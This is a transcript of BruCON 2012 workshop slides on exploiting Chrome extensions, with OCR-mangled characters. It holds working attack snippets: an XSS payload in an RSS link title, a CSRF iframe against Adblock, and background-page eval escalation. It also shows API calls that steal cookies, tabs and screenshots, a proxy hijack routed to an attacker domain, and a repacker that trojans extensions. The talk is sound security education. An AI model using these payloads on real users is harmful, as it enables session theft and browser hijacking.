advanced chrome extension exploitation
DESCRIPTION
Slides from BruCON 2012 workshops "Advanced Chrome Extension exploitation" by Kyle Osborn and Krzysztof KotowiczTRANSCRIPT
![Page 1: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/1.jpg)
Advanced Chrome Extension Exploita5on
Kyle ‘Kos’ OsbornKrzysztof Kotowicz
1
![Page 2: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/2.jpg)
2
• Krzysztof Kotowicz– IT security consultant at SecuRing– h<p://blog.kotowicz.net–@kkotowicz
• Kyle Osborn– Pentester at AppSec ConsulFng– h<p://kyleosborn.com/
–@theKos
Introduc5on
![Page 3: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/3.jpg)
Previous research
3
• Kyle Osborn, Ma< Johansen– Hacking Google ChromeOS (BH 2011)
• N. Carlini, A. Porter Felt, D. Wagner -‐ UC Berkeley– An EvaluaFon of the Google Chrome Extension Security Architectureh<p://www.eecs.berkeley.edu/~afelt/extensionvulnerabiliFes.pdf
• Krzysztof Kotowicz– h<p://blog.kotowicz.net/2012/02/intro-‐to-‐chrome-‐addons-‐hacking.html
![Page 4: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/4.jpg)
Plan
4
• Briefing– Chrome extensions security 101
– Abusing Chrome extensions
– Easy exploitaFon– Using XSS ChEF
• Workshops– all of the above in pracFce & more
– h<p://kotowicz.net/brucon/
![Page 5: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/5.jpg)
CHROME EXTENSIONS SECURITY
5
![Page 6: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/6.jpg)
Chrome extensions security
6
• Extensions are HTML5 applicaFons packaged in signed .crx files
• chrome-‐extension://<id> URLs
• Have access to powerful API– chrome.tabs
– chrome.history
– chrome.cookies
– chrome.proxy
– bundled plugins (NPAPI)
• Permissions defined in manifest.json
![Page 7: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/7.jpg)
Chrome extensions security
7
• Extensions have a lot of power to abuse
• How bad can it be? Think...– global XSS– idenFty thec (bookmarks, history, cookies)
– filesystem access
– remote code execuFon (meterpreter)
![Page 8: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/8.jpg)
Chrome extensions securityContent script
8
• Can interact with webpage DOM– e.g. execute Javascript– isolated worlds for page JS / content script JS
• No access to chrome.* API
![Page 9: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/9.jpg)
Chrome extensions securityView pages
9
• Have access to chrome.* API
• No access to webpage DOM
• Content scripts and view pages can only exchange messages
• Examples:– opFon pages– new tabs– popups
![Page 10: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/10.jpg)
Chrome extensions securityBackground page
10
• View page that runs constantly
• Has access to chrome.* API
• The UlPmate Target
![Page 11: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/11.jpg)
Chrome extensions security
11
• Currently, Chrome extension security is very reliant on the developer–WriFng bad code is easy
– Giving extensions more permissions than necessary is easier
• Extensions suffer from common web vulnerabili5es
![Page 12: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/12.jpg)
Chrome extensions security
12
• XSS: page DOM has a vector that is grabbed and executed by extension
• CSRF: Page directly requests extension URLs
<iframe src="chrome-‐extension://<id>/pages/subscribe.html?location=//evil/whitelist"></iframe>
<link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='alert(1)'>" href="/rss.rss">
![Page 13: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/13.jpg)
Chrome extensions security
13
• NPAPI plugins vulns– Extensions can use NPAPI plugins (.dll, .so etc.)– Those run outside of Chrome sandboxes
– Full permissions of current OS user
– Possible vulns: RCE, buffer overflows, path disclosures, command injecFons, ...
• Manual review by Google if plugin is used
![Page 14: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/14.jpg)
Chrome extensions security
14
• Content-‐Security-‐Policy prevents XSS
• Chrome supports CSP in the webpages
• Chrome supports CSP in extensions
• But...
X-Content-Security-Policy, X-WebKit-CSP
content_security_policy in manifest
![Page 15: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/15.jpg)
Extensions vs CSP in webpage
• Total CSP bypass– You can inject any code via extension
– Injected code:• is same origin with the page (document.cookie etc.)
• can communicate with view pages (chrome.extension.sendMessage)
15
chrome.tabs.executeScript(null, {code:“alert(1)”})
![Page 16: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/16.jpg)
Extensions vs CSP in manifest
• Cannot execute arbitrary code
• Even CSP in extension + CSP in webpage does not make you 100% safe!– You can pivot the a<ack through webpage– You need addiFonal vulnerabiliFes to exploit this
16
![Page 17: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/17.jpg)
Chrome extensions security
17
• Most commonly vulnerable– RSS readers– Note extensions–Web Developer extensions
![Page 18: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/18.jpg)
Chrome extensions securitymanifest.json
18
• Defines resources, permissions, name etc.
• v1– insecure, but everyone uses it
• v2– Secure Content-‐Security-‐Policy by default (no XSS!)
– Pages cannot access extension URLs (no CSRF!)
– Unpopular• 26 out of top 1000 extensions
– Will be enforced in Q3 2013
![Page 19: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/19.jpg)
Chrome extensions securityInstalla5on Methods
19
• Chrome Web Store– curated by Google
• .crx install from any website (prompts user)– Chrome 21 makes off-‐store installs harder
• Drag & drop .crx to chrome://extensions• Or use --enable-easy-off-store-extension-install flag
• MiTM not possible due to cerFficate signing
![Page 20: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/20.jpg)
ABUSING CHROME EXTENSIONS
20
![Page 21: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/21.jpg)
Fingerprin5ng
21
• The simplest method– Generate a list of known extension IDs, and bruteforce chrome-‐extension://ID/ resources to discovered extensions
– use onerror/onload to check for existence• hZp://blog.kotowicz.net/2012/02/intro-‐to-‐chrome-‐addons-‐hacking.html
![Page 22: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/22.jpg)
CSRF -‐ example
22
• Chrome Adblock 2.5.22– Extension UI uses pages/subscribe.html
– pages/subscribe.html?locaFon=url will subscribe to new block list
• Can be called by any webpage<iframe src="chrome-extension://<id>/pages/subscribe.html?location=//evil/whitelist">
var queryparts = parseUri.parseSearch(document.location.search); BGcall("subscribe", {id: 'url:' + queryparts.location});
![Page 23: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/23.jpg)
XSS -‐ example
23
• Slick RSS + Slick RSS: Feed Finder– simple injecFon locaFon (<link> tag Ftle)
<link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>"href="/rss.rss">
![Page 24: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/24.jpg)
Leveraging XSS
24
• Vector in page => XSS in content script– No access to chrome.* API
– Only chrome.extension.*• e.g. chrome.extension.connect & chrome.extension.sendMessage to communicate
– Need to elevate to view script• From view script
chrome.extension .getBackgroundPage() .eval(”mwahahahahaaaaa!”)
![Page 25: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/25.jpg)
XSS -‐ example
25
![Page 26: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/26.jpg)
NPAPI vulns -‐ example
• CR-‐GPG 0.7.8 (gpg-‐gmail bridge)
• GPG in gmail???
26
![Page 27: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/27.jpg)
NPAPI vulns -‐ example
27
• Uses external gpg install through NPAPI plugin
• Long story short:– Easy to get from this:
![Page 28: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/28.jpg)
NPAPI vulns -‐ example
28
• To this:
![Page 29: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/29.jpg)
NPAPI vulns -‐ example
29
• To this:
![Page 30: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/30.jpg)
NPAPI vulns -‐ example
30
• To this:
![Page 31: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/31.jpg)
EASY EXPLOITATION
31
![Page 32: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/32.jpg)
Easy exploita5on
32
• alert(1) -‐ Now what?
• Use an automated tool to pillage and plunder
• BeEF does a great job hooking intoDOMs
• But – Need a special tool designed to take advantage of Chrome extension APIs
![Page 33: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/33.jpg)
Easy exploita5on
33
• Enter XSS ChEF(Chrome Extension Exploita2on Framework)
– Designed from the ground up for exploiFng extensions
– Fast (uses WebSockets)
– Preloaded with automateda<ack scripts
![Page 34: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/34.jpg)
Easy exploita5on
34
• Monitor open tabs of vicPms
• Execute JS on every tab
• Extract HTML
• Read/write cookies
• Access localStorage
• Manipulate browser history
• Take screenshots of tabs
• Inject BeEF hooks / keyloggers
![Page 35: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/35.jpg)
USING XSS CHEF
35
![Page 36: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/36.jpg)
XSS ChEFLaunching server
36
$ php -vPHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42) Copyright (c) 1997-2012 The PHP GroupZend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans
$ php server.php 2>command.logXSS ChEF serverby Krzysztof Kotowicz - kkotowicz at gmail dot com
Usage: php server.php [port=8080] [host=127.0.0.1]Communication is logged to stderr, use php server.php [port] 2>log.txt2012-07-22 12:40:06 [info] Server created2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:80802012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1...
![Page 37: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/37.jpg)
XSS ChEFConsole
37
![Page 38: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/38.jpg)
XSS ChEFHook code
38
![Page 39: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/39.jpg)
XSS ChEF
39
![Page 40: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/40.jpg)
XSS ChEF
40
![Page 41: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/41.jpg)
XSS ChEF
41
![Page 42: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/42.jpg)
API abuse
• chrome.tabs.query -‐ gets access to all tabs URLs (even incognito!), Ptles, documents etc.
42
chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t});});
![Page 43: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/43.jpg)
API abuse
• chrome.tabs.executeScript -‐ global XSS on any tab
• bypasses CSP
43
chrome.tabs.executeScript(null, { code:"alert(document.cookie)"});
![Page 44: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/44.jpg)
API abuse
• chrome.tabs.captureVisibleTab
44
chrome.tabs.captureVisibleTab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url});});
![Page 45: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/45.jpg)
API abuse
• chrome.cookies– read/write cookies, even h<pOnly
45
chrome.cookies.getAll({url:"https://www.google.com/"}, cb);
{"domain": ".google.com","expirationDate": 1358717774.49,"hostOnly": false,"httpOnly": true,"name": "NID","path": "/","secure": false,"session": false,"storeId": "0","value": "61=...."},...
chrome.cookies.set({ url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', secure: true, httpOnly: true, expirationDate: null, path: '/'}, cb);
![Page 46: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/46.jpg)
API abuse
• chrome.proxy -‐ silently change HTTP proxy!
46
var evilProxy = { "mode": "fixed_servers", "rules": { "bypassList": ["<local>","ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY "singleProxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } }}chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb);
![Page 47: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/47.jpg)
API abuse
• chrome.bookmarks -‐ interact with bookmarks
47
chrome.bookmarks.search("http", cb);
{"dateAdded": 1342946320,"id": "123","index": 0,"parentId": "21","title": "GMail","url": "https://mail.google.com/"}
![Page 48: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/48.jpg)
Pre-‐Workshop Info
• Requirements– Latest version of XSS ChEF required (w/ dependencies)
• PHP 5.3 + HTTP server, opFonally node.js• unzip, curl • Only heavily tested under OS X & Linux
– Chrome
– Selected extensions
• All links can be found onhdp://kotowicz.net/brucon
48
![Page 49: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/49.jpg)
BREAK (THEN WORKSHOP)
49
hdp://kotowicz.net/brucon
![Page 50: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/50.jpg)
Workshop
• Part one: ExploitaPon– Discovery– AutomaFon
• Part two: Repacking– Leveraging the human factor
50
![Page 51: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/51.jpg)
Part one: Exploita5on
• Slick RSS
• Slick RSS: Feed Finder
51
![Page 52: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/52.jpg)
Part one: Exploita5on
• Web Developer
52
![Page 53: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/53.jpg)
Part one: Exploita5on
• Springpad Extension
53
![Page 54: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/54.jpg)
Part one: Exploita5on
• Cookie Manager
54
![Page 55: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/55.jpg)
Part one: Exploita5on
• cr-‐gpg
55
![Page 56: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/56.jpg)
Part Two: Repacking
• Wanted to get MORE privileges
• UPlizes “click-‐through-‐syndrome”
• You can repack any other benign extension, adding malicious part (e.g. XSS chef hook)
56
![Page 57: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/57.jpg)
Part Two: Repacking
$ ./repacker-webstore.sh <ID> output.crx
Unpacking ...
Injecting xsschef...
Adding permissions...
Saving...
Done.
Moving signed extension to output.crx
57